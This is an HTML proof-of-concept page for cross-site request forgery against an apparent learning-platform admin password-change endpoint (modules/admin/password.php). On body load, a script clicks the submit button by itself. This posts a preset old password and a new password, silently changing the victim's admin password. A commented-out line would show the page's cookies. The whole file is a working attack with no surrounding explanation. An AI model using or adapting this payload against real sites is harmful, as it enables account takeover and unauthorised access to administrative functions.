<body onload='boomboom()'>
<form method="POST" action="http://localhost:1180/modules/admin/password.php?submit=yes&changePass=do">
  <table width="99%">
  <tbody>
  <tr>
    <th width="220" class='left'>$langOldPass</th>
    <td><input class='FormData_InputText' type="password" size="40" name="old_pass" value="123"</td>
    </tr>
   <tr>
     <th class='left'>$langNewPass1</th>
     <td>";

	<input class='FormData_InputText' type="password" size="40" name="password_form" value="12"></td>
   </tr>
   <tr>
     <th width="150" class='left'>$langNewPass2</th>
     <td><input class='FormData_InputText' type="password" size="40" name="password_form1" value="12"></td>
    </tr>
	<tr>
      <th>&nbsp;</th>
      <td><input type="Submit" name="submit" id="boom" value="$langModify"></td>
    </tr>
	</tbody>
    </table>

    <script type="text/javascript">
      function boomboom() {
        document.getElementById("boom").click();

        // alert(document.cookie);



      }
    </script>

</form>
</body>